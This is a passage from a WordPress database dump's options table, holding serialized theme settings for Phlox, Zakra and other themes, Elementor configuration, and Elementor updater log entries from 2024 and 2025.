age_title_bar_meta_enabled\";b:0;s:28:\"page_title_bar_bread_enabled\";b:1;s:29:\"page_title_bar_bread_bordered\";b:1;s:30:\"page_title_bar_bread_sep_style\";s:0:\"\";s:25:\"page_title_bar_text_align\";s:6:\"center\";s:28:\"page_title_bar_overlay_color\";s:0:\"\";s:30:\"page_title_bar_overlay_pattern\";s:4:\"none\";s:38:\"page_title_bar_overlay_pattern_opacity\";s:3:\"0.5\";s:26:\"page_title_bar_color_style\";s:5:\"light\";s:22:\"page_title_bar_bg_show\";s:0:\"\";s:26:\"page_title_bar_bg_parallax\";s:0:\"\";s:23:\"page_title_bar_bg_color\";s:0:\"\";s:22:\"page_title_bar_bg_size\";s:0:\"\";s:23:\"page_title_bar_bg_image\";s:0:\"\";s:27:\"page_title_bar_bg_video_mp4\";s:0:\"\";s:27:\"page_title_bar_bg_video_ogg\";s:0:\"\";s:28:\"page_title_bar_bg_video_webm\";s:0:\"\";s:22:\"page_title__typography\";s:0:\"\";s:25:\"page_subtitle__typography\";s:0:\"\";s:32:\"page_title_breadcrumb_typography\";s:0:\"\";s:37:\"page_title_breadcrumb_link_typography\";s:0:\"\";s:31:\"page_title_breadcrumb_sep_color\";s:0:\"\";s:35:\"site_elementor_footer_edit_template\";i:358;s:30:\"site_elementor_footer_template\";i:358;s:39:\"site_elementor_footer_templates_library\";s:0:\"\";s:22:\"site_footer_use_legacy\";s:0:\"\";s:21:\"site_footer_is_sticky\";s:0:\"\";s:9:\"copyright\";s:47:\"© {{Y}} {{sitename}}. All rights reserved.\";s:11:\"attribution\";s:0:\"\";s:34:\"footer_privacy_policy_link_display\";s:0:\"\";s:17:\"site_footer_info3\";s:0:\"\";s:37:\"site_subfooter_bar_section_use_legacy\";s:0:\"\";s:18:\"show_subfooter_bar\";s:0:\"\";s:20:\"subfooter_bar_layout\";s:20:\"vertical-small-boxed\";s:29:\"subfooter_bar_layout_bg_color\";s:7:\"#fafafa\";s:30:\"subfooter_bar_top_border_color\";s:7:\"#EAEAEA\";s:33:\"site_subfooter_section_use_legacy\";s:0:\"\";s:14:\"show_subfooter\";s:0:\"\";s:16:\"subfooter_layout\";s:11:\"1-3_1-3_1-3\";s:25:\"subfooter_layout_bg_color\";s:0:\"\";s:28:\"subfooter_layout_bg_gradient\";s:0:\"\";s:25:\"subfooter_layout_bg_image\";s:0:\"\";s:34:\"subfooter_layout_bg_image_position\";s:13:\"center center\";s:30:\"subfooter_layout_bg_image_size\";s:5:\"cover\";s:32:\"subfooter_layout_bg_image_repeat\";s:9:\"no-repeat\";s:23:\"footer_widget_dark_mode\";s:0:\"\";s:26:\"subfooter_top_border_color\";s:7:\"#EAEAEA\";s:24:\"subfooter_hide_on_tablet\";s:0:\"\";s:23:\"subfooter_hide_on_phone\";s:0:\"\";s:44:\"site_subfooter_appearance_section_use_legacy\";s:0:\"\";s:28:\"subfooter_appearance_padding\";s:0:\"\";s:33:\"subfooter_widget_title_typography\";s:0:\"\";s:32:\"subfooter_widget_text_typography\";s:0:\"\";s:32:\"subfooter_widget_link_typography\";s:0:\"\";s:30:\"site_footer_section_use_legacy\";s:0:\"\";s:16:\"show_site_footer\";s:1:\"1\";s:29:\"site_footer_components_layout\";s:14:\"footer_preset4\";s:20:\"site_footer_bg_color\";s:7:\"#1A1A1A\";s:23:\"site_footer_bg_gradient\";s:0:\"\";s:23:\"footer_top_border_color\";s:7:\"#EAEAEA\";s:23:\"footer_top_border_width\";s:1:\"1\";s:41:\"site_footer_appearence_section_use_legacy\";s:0:\"\";s:27:\"footer_copyright_typography\";s:0:\"\";s:34:\"footer_attribution_link_typography\";s:0:\"\";s:37:\"footer_privacy_policy_link_typography\";s:0:\"\";s:27:\"footer_main_menu_typography\";s:0:\"\";s:17:\"show_goto_top_btn\";s:1:\"1\";s:16:\"goto_top_animate\";s:1:\"1\";s:18:\"goto_top_alignment\";s:5:\"right\";s:33:\"enable_site_image_preload_preview\";s:0:\"\";s:38:\"site_image_prelaod_transition_duration\";s:0:\"\";s:27:\"breadcrumbs_text_max_length\";s:2:\"30\";s:12:\"gopro_option\";s:0:\"\";s:25:\"auxin_user_custom_js_head\";s:0:\"\";s:20:\"auxin_user_custom_js\";s:0:\"\";s:16:\"enable_theme_seo\";s:1:\"1\";s:27:\"auxin_user_google_analytics\";s:0:\"\";s:24:\"auxin_google_map_api_key\";s:0:\"\";s:27:\"auxin_user_google_marketing\";s:0:\"\";s:12:\"custom_logo2\";s:0:\"\";s:35:\"site_header_btn1_section_use_legacy\";s:0:\"\";s:21:\"site_header_show_btn1\";s:0:\"\";s:31:\"site_header_show_btn1_on_tablet\";s:1:\"1\";s:30:\"site_header_show_btn1_on_phone\";s:1:\"1\";s:22:\"site_header_btn1_label\";s:6:\"Button\";s:21:\"site_header_btn1_size\";s:5:\"large\";s:22:\"site_header_btn1_shape\";s:5:\"curve\";s:22:\"site_header_btn1_style\";s:0:\"\";s:27:\"site_header_btn1_typography\";s:0:\"\";s:21:\"site_header_btn1_icon\";s:0:\"\";s:27:\"site_header_btn1_icon_align\";s:7:\"default\";s:27:\"site_header_btn1_color_name\";s:9:\"ball-blue\";s:37:\"site_header_btn1_color_name_on_sticky\";s:9:\"ball-blue\";s:21:\"site_header_btn1_link\";s:1:\"#\";s:23:\"site_header_btn1_target\";s:5:\"_self\";s:35:\"site_header_btn2_section_use_legacy\";s:0:\"\";s:21:\"site_header_show_btn2\";s:0:\"\";s:31:\"site_header_show_btn2_on_tablet\";s:1:\"1\";s:30:\"site_header_show_btn2_on_phone\";s:1:\"1\";s:22:\"site_header_btn2_label\";s:6:\"Button\";s:21:\"site_header_btn2_size\";s:5:\"large\";s:22:\"site_header_btn2_shape\";s:5:\"curve\";s:22:\"site_header_btn2_style\";s:7:\"outline\";s:27:\"site_header_btn2_typography\";s:0:\"\";s:21:\"site_header_btn2_icon\";s:0:\"\";s:27:\"site_header_btn2_icon_align\";s:7:\"default\";s:27:\"site_header_btn2_color_name\";s:7:\"emerald\";s:37:\"site_header_btn2_color_name_on_sticky\";s:9:\"ball-blue\";s:21:\"site_header_btn2_link\";s:0:\"\";s:23:\"site_header_btn2_target\";s:5:\"_self\";s:25:\"site_secondary_logo_image\";s:0:\"\";s:30:\"site_secondary_logo_max_height\";s:2:\"50\";s:16:\"auxin_login_skin\";s:7:\"default\";s:19:\"auxin_login_message\";s:0:\"\";s:22:\"auxin_login_logo_image\";s:0:\"\";s:22:\"auxin_login_logo_width\";s:2:\"84\";s:23:\"auxin_login_logo_height\";s:2:\"84\";s:19:\"auxin_login_bg_show\";s:0:\"\";s:20:\"auxin_login_bg_color\";s:0:\"\";s:20:\"auxin_login_bg_image\";s:0:\"\";s:19:\"auxin_login_bg_size\";s:4:\"auto\";s:22:\"auxin_login_bg_pattern\";s:0:\"\";s:21:\"auxin_login_bg_repeat\";s:9:\"no-repeat\";s:23:\"auxin_login_bg_position\";s:8:\"left top\";s:21:\"auxin_login_bg_attach\";s:6:\"scroll\";s:22:\"auxin_login_body_class\";s:0:\"\";s:17:\"auxin_login_style\";s:0:\"\";s:14:\"auxin_404_page\";s:7:\"default\";s:24:\"auxin_maintenance_enable\";s:0:\"\";s:22:\"auxin_maintenance_page\";s:7:\"default\";s:31:\"auxin_search_exclude_post_types\";s:0:\"\";s:29:\"auxin_search_exclude_no_media\";s:0:\"\";s:28:\"auxin_search_pinned_contents\";s:0:\"\";s:23:\"auxin_customizer_export\";s:0:\"\";s:23:\"auxin_customizer_import\";s:0:\"\";s:24:\"enable_custom_typography\";s:0:\"\";s:18:\"content_typography\";s:20:\"_gof_Raleway:regular\";s:21:\"main_title_typography\";s:16:\"_gof_Raleway:300\";s:21:\"page_title_typography\";s:16:\"_gof_Raleway:300\";s:22:\"header_menu_typography\";s:20:\"_gof_Raleway:regular\";s:18:\"buttons_typography\";s:20:\"_gof_Raleway:regular\";s:19:\"include_latin_chars\";s:0:\"\";s:16:\"show_header_cart\";s:0:\"\";s:16:\"header_cart_type\";s:8:\"dropdown\";s:21:\"site_header_card_mode\";s:0:\"\";s:16:\"header_cart_icon\";s:25:\"auxicon-shopping-cart-1-1\";s:21:\"site_header_cart_text\";s:15:\"Shopping Basket\";s:26:\"site_header_cart_animation\";s:0:\"\";s:25:\"header_cart_dropdown_skin\";s:5:\"light\";s:30:\"header_cart_dropdown_action_on\";s:5:\"hover\";s:31:\"header_cart_dropdown_total_text\";s:9:\"SUB TOTAL\";s:21:\"show_header_myaccount\";s:0:\"\";s:20:\"show_header_wishlist\";s:0:\"\";s:19:\"show_topheader_cart\";s:0:\"\";s:17:\"product_cart_icon\";s:25:\"auxicon-shopping-cart-1-1\";s:26:\"product_cart_dropdown_skin\";s:5:\"light\";s:31:\"product_cart_dropdown_action_on\";s:5:\"hover\";s:31:\"product_single_sidebar_position\";s:13:\"right-sidebar\";s:33:\"product_single_sidebar_decoration\";s:6:\"border\";s:24:\"product_max_width_layout\";s:0:\"\";s:30:\"product_index_sidebar_position\";s:13:\"right-sidebar\";s:32:\"product_index_sidebar_decoration\";s:6:\"border\";s:32:\"product_archive_max_width_layout\";s:0:\"\";s:35:\"product_archive_show_view_cart_link\";s:0:\"\";s:33:\"product_category_sidebar_position\";s:13:\"right-sidebar\";s:35:\"product_category_sidebar_decoration\";s:6:\"border\";s:11:\"user_rating\";s:2:\"10\";}','yes'),
(101105,'_transient_auxin-notice-rate_phlox_free-snooze','1621715313','yes'),
(101123,'_elementor_settings_update_time','1752415232','yes'),
(101124,'elementor_cpt_support','a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}','yes'),
(101125,'elementor_allow_tracking','no','yes'),
(101126,'elementor_notice','','yes'),
(101127,'elementor_css_print_method','external','yes'),
(101128,'elementor_editor_break_lines','','yes'),
(101129,'elementor_unfiltered_files_upload','','yes'),
(101130,'elementor_font_display','auto','yes'),
(101131,'elementor_load_fa4_shim','','yes'),
(101134,'elementor_experiment-a11y_improvements','active','yes'),
(101135,'elementor_experiment-e_import_export','default','yes'),
(101136,'elementor_experiment-landing-pages','active','yes'),
(101177,'phlox_license_update','1','no'),
(101211,'theme_mods_twentytwentyone','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1621545547;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:4:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:6:\"text-2\";i:3;s:6:\"text-3\";}s:9:\"sidebar-1\";a:0:{}}}}','no'),
(101274,'theme_mods_hello-elementor','a:5:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1621545763;s:4:\"data\";a:1:{s:19:\"wp_inactive_widgets\";a:4:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:6:\"text-2\";i:3;s:6:\"text-3\";}}}s:11:\"custom_logo\";i:786;}','yes'),
(101282,'theme_mods_zakra','a:17:{i:0;b:0;s:14:\"zakra_color_h1\";s:7:\"#16181a\";s:29:\"zakra_base_typography_heading\";a:5:{s:11:\"font-family\";s:129:\"-apple-system, blinkmacsystemfont, segoe ui, roboto, oxygen-sans, ubuntu, cantarell, helvetica neue, helvetica, arial, sans-serif\";s:7:\"variant\";s:3:\"500\";s:9:\"font-size\";s:6:\"2.5rem\";s:11:\"line-height\";s:3:\"1.3\";s:5:\"color\";s:7:\"#16181a\";}s:19:\"zakra_typography_h1\";a:4:{s:11:\"font-family\";s:129:\"-apple-system, blinkmacsystemfont, segoe ui, roboto, oxygen-sans, ubuntu, cantarell, helvetica neue, helvetica, arial, sans-serif\";s:7:\"variant\";s:3:\"500\";s:9:\"font-size\";s:6:\"2.5rem\";s:11:\"line-height\";s:3:\"1.3\";}s:14:\"zakra_color_h2\";s:7:\"#16181a\";s:19:\"zakra_typography_h2\";a:4:{s:11:\"font-family\";s:129:\"-apple-system, blinkmacsystemfont, segoe ui, roboto, oxygen-sans, ubuntu, cantarell, helvetica neue, helvetica, arial, sans-serif\";s:7:\"variant\";s:3:\"500\";s:9:\"font-size\";s:7:\"2.25rem\";s:11:\"line-height\";s:3:\"1.3\";}s:14:\"zakra_color_h3\";s:7:\"#16181a\";s:19:\"zakra_typography_h3\";a:4:{s:11:\"font-family\";s:129:\"-apple-system, blinkmacsystemfont, segoe ui, roboto, oxygen-sans, ubuntu, cantarell, helvetica neue, helvetica, arial, sans-serif\";s:7:\"variant\";s:3:\"500\";s:9:\"font-size\";s:4:\"2rem\";s:11:\"line-height\";s:3:\"1.3\";}s:14:\"zakra_color_h4\";s:7:\"#16181a\";s:19:\"zakra_typography_h4\";a:4:{s:11:\"font-family\";s:129:\"-apple-system, blinkmacsystemfont, segoe ui, roboto, oxygen-sans, ubuntu, cantarell, helvetica neue, helvetica, arial, sans-serif\";s:7:\"variant\";s:3:\"500\";s:9:\"font-size\";s:7:\"1.75rem\";s:11:\"line-height\";s:3:\"1.3\";}s:14:\"zakra_color_h5\";s:7:\"#16181a\";s:19:\"zakra_typography_h5\";a:4:{s:11:\"font-family\";s:129:\"-apple-system, blinkmacsystemfont, segoe ui, roboto, oxygen-sans, ubuntu, cantarell, helvetica neue, helvetica, arial, sans-serif\";s:7:\"variant\";s:3:\"500\";s:9:\"font-size\";s:8:\"1.313rem\";s:11:\"line-height\";s:3:\"1.3\";}s:14:\"zakra_color_h6\";s:7:\"#16181a\";s:19:\"zakra_typography_h6\";a:4:{s:11:\"font-family\";s:129:\"-apple-system, blinkmacsystemfont, segoe ui, roboto, oxygen-sans, ubuntu, cantarell, helvetica neue, helvetica, arial, sans-serif\";s:7:\"variant\";s:3:\"500\";s:9:\"font-size\";s:8:\"1.125rem\";s:11:\"line-height\";s:3:\"1.3\";}s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1621545906;s:4:\"data\";a:13:{s:19:\"wp_inactive_widgets\";a:4:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:6:\"text-2\";i:3;s:6:\"text-3\";}s:13:\"sidebar-right\";a:0:{}s:12:\"sidebar-left\";a:0:{}s:23:\"header-top-left-sidebar\";a:0:{}s:24:\"header-top-right-sidebar\";a:0:{}s:16:\"footer-sidebar-1\";a:0:{}s:16:\"footer-sidebar-2\";a:0:{}s:16:\"footer-sidebar-3\";a:0:{}s:16:\"footer-sidebar-4\";a:0:{}s:23:\"footer-bar-left-sidebar\";a:0:{}s:24:\"footer-bar-right-sidebar\";a:0:{}s:15:\"wc-left-sidebar\";a:0:{}s:16:\"wc-right-sidebar\";a:0:{}}}}','no'),
(101283,'zakra_upgrade_notice_start_time','1621545764','yes'),
(101284,'zakra_migrations','1','yes'),
(101293,'theme_mods_color-blog-dark','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1621546022;s:4:\"data\";a:7:{s:19:\"wp_inactive_widgets\";a:4:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:6:\"text-2\";i:3;s:6:\"text-3\";}s:9:\"sidebar-1\";a:0:{}s:18:\"header-ads-section\";a:0:{}s:14:\"footer-sidebar\";a:0:{}s:16:\"footer-sidebar-2\";a:0:{}s:16:\"footer-sidebar-3\";a:0:{}s:16:\"footer-sidebar-4\";a:0:{}}}}','no'),
(101295,'widget_color_blog_dark_author_info','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101296,'widget_color_blog_dark_latest_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101297,'widget_color_blog_dark_social_media','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101298,'color_blog_dark_admin_notice_welcome','1','yes'),
(101336,'nav_menu_options','a:1:{s:8:\"auto_add\";a:0:{}}','off'),
(101342,'elementor_library_category_children','a:0:{}','yes'),
(101672,'elementor_log','a:42:{s:32:\"02e0936433b9cf268387ab24ba15af46\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2024-08-12 07:37:18\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.23.3\";s:2:\"to\";s:6:\"3.23.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2024-08-12 07:37:18\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.23.3\";s:2:\"to\";s:6:\"3.23.4\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"801f131dede62dd6c4086fad506aa9ca\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2024-08-12 07:37:19\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2024-08-12 07:37:19\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"77f1233b3747f956ede984370cb44f92\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2024-08-12 07:37:19\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2024-08-12 07:37:19\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"6cc6e7d8b6c4b68ff2dd5f028e9be496\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2024-08-12 07:37:19\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2024-08-12 07:37:19\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"b0052cd85f04059871858c1b5424af82\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2024-08-12 07:37:19\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.23.3\";s:2:\"to\";s:6:\"3.23.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2024-08-12 07:37:19\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.23.3\";s:2:\"to\";s:6:\"3.23.4\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"4a69e3e69cff1e8503fd0ac6c0a7fb8f\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:09:28\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:09:28\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"ea489cd2be30109c990db1f084c5f3f4\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:09:28\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:09:28\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"ee9db7560875065d9eb71d091159cf59\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:09:28\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:09:28\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"d839c071ac9fa8de59bec901ec009fd5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:09:28\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:37:\"Elementor/Upgrades - _v_3_26_0 Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:09:28\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:37:\"Elementor/Upgrades - _v_3_26_0 Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"3f5d2323d96f4e218ee9c0f3ae8a5985\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:09:28\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:39:\"Elementor/Upgrades - _v_3_26_0 Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:09:28\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:39:\"Elementor/Upgrades - _v_3_26_0 Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"e326b0b6fd3d1230d99c915fd679951f\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:09:28\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.23.4\";s:2:\"to\";s:6:\"3.26.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:09:28\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.23.4\";s:2:\"to\";s:6:\"3.26.5\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"11a82c1aef7979b4c0e008c5edd6cd3e\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:09:28\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.23.4\";s:2:\"to\";s:6:\"3.26.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:09:28\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.23.4\";s:2:\"to\";s:6:\"3.26.5\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"c62d0f906c93cba1d20a66c4723a247f\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:28:35\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"elementor-pro::elementor_pro_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:28:35\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"elementor-pro::elementor_pro_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"0c5afbbad69803ebb7b2bb61ec47da0a\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:28:35\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:48:\"Elementor Pro/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:28:35\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:48:\"Elementor Pro/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"ed9719f265419055e7752b8ff328f889\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:28:35\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor Pro/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:28:35\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:50:\"Elementor Pro/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"e8292b4b6a30110ab0593e6e54901d5b\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:28:35\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:6:\"3.23.3\";s:2:\"to\";s:6:\"3.26.3\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:28:35\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:6:\"3.23.3\";s:2:\"to\";s:6:\"3.26.3\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"2180b3bf83c59a3183f6fd0a0fc87841\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:28:35\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:6:\"3.23.3\";s:2:\"to\";s:6:\"3.26.3\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:28:35\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:6:\"3.23.3\";s:2:\"to\";s:6:\"3.26.3\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"9101391016dc182d4c54dd16acb31770\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:31:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.26.5\";s:2:\"to\";s:6:\"3.27.0\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:31:56\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.26.5\";s:2:\"to\";s:6:\"3.27.0\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"203ded14f67a1cc24504a869096a1267\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 